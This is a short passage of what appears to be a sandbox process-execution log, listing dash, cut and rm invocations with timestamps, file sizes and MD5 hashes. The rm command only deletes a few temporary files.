                            MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/cut
                            Arguments:cut -c -80
                            File size:47480 bytes
                            MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/dash
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):14:18:05
                            Start date (UTC):21/11/2024
                            Path:/usr/bin/rm
                            Arguments:rm -f /tmp/tmp.XbXsBy4fsU /tmp/tmp.w38YgFUlMq /tmp/tmp.stuAWr8jHa
                            File size:72056 bytes
                            MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b